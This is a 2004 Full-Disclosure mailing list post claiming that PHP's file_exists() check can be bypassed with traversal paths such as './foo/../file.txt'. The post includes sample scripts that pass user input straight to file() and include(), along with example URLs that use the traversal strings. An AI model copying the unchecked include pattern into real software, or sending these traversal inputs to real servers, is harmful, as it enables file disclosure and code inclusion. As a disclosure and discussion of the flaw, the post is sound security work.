[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-Disclosure] file_exists() bypassing , critical problem ?
- To: <full-disclosure@lists.netsys.com>
- Subject: [Full-Disclosure] file_exists() bypassing , critical problem ?
- From: "Nourredine Himeur" <lostnoobs@security-challenge.com>
- Date: Mon, 2 Feb 2004 11:12:28 +0100
Hi,
There is a security problem on the file_exists() function who allows
unauthorized users to bypassing the function.
For example, an user use this function for checking the existence and
display the source code of his file "my_file.php" in the "/test"
directory.
He use for this a script like this one :
----- file_exists.php -----
<?php
if(file_exists($var)){
echo("File exist<br><br>");
$source = file( $var );
while ( list( $num_line, $line ) = each( $source ) )
{
echo "<B>Line $num_line:</B> ".htmlspecialchars( $line ) . "<br>";
}
}else{
echo("File doesn't exist<br<br ");
$source = file( $var );
while ( list( $num_line, $line ) = each( $source ) )
{
echo "<B>Line $num_line:</B> ".htmlspecialchars( $line ) . "<br>";
}
}
?
----- file_exists.php -----
He test his script with the following adress on his server :
http://[server]/test/file_exists.php?var=my_file.php
The file "my_file.php" contain the following text :
----- my_file.php -----
PHP is a widely-used
general-purpose scripting
language that is especially
suited for Web development
and can be embedded into HTML.
----- my_file.php -----
After launching his script, he obtain :
----- http://[server]/test/file_exists.php?var=my_file.php -----
File exist
Line 0: PHP is a widely-used
Line 1: general-purpose scripting
Line 2: language that is especially
Line 3: suited for Web development
Line 4: and can be embedded into HTML.
----- http://[server]/test/file_exists.php?var=my_file.php -----
Up to here everything seems to be normal.
If he test it with another name file, he obtain :
----- http://[server]/test/file_exists.php?var=another_file.php -----
File doesn't exist
Warning: file(test): failed to open stream: No such file or directory in
/home/xxx/www/test/file_exists.php on line 11
Warning: Variable passed to each() is not an array or object in
/home/xxx/www/test/file_exists.php on line 12
----- http://[server]/test/file_exists.php?var=another_file.php -----
It's normal too...
But, if an user test this script for example with the following link :
http://[server]/test/file_exists.php?var=anything/../my_file.php, he
obtain
:
-----
http://[server]/test/file_exists.php?var=anything/../my_file.php -----
File doesn't exist
Line 0: PHP is a widely-used
Line 1: general-purpose scripting
Line 2: language that is especially
Line 3: suited for Web development
Line 4: and can be embedded into HTML.
-----
http://[server]/test/file_exists.php?var=anything/../my_file.php -----
We can see that the file_exists() function return that the file doesn't
exist, but the source code has been displayed.
It's a very critical bug because a malicious user can use it to bypassing
the file_exist() protection on a include() script for example.
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
Another example more simply:
In the same directory :
test.php
-----------------------------------------------------------
<?
if(file_exists($page)){
echo("Sorry the local page is protected");
}else{
include($page);
}
?>
-----------------------------------------------------------
file.txt
-----------------------------------------------------------
Hello Word
-----------------------------------------------------------
http://www.example.com/test.php?page=file.txt
Result:
Sorry the local page is protected
http://www.example.com/test.php?page=./foo/../file.txt
Result:
Hello Word
The function file_exists() is bypassing
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
I want to know if you thinks that's a real vulnerability or not ?
(securityfocus says NO and don't want to publish it)
If you have any questions. Don't hesitate to contact me.
Nourredine Himeur
lostnoobs@security-challenge.com
www.security-challenge.com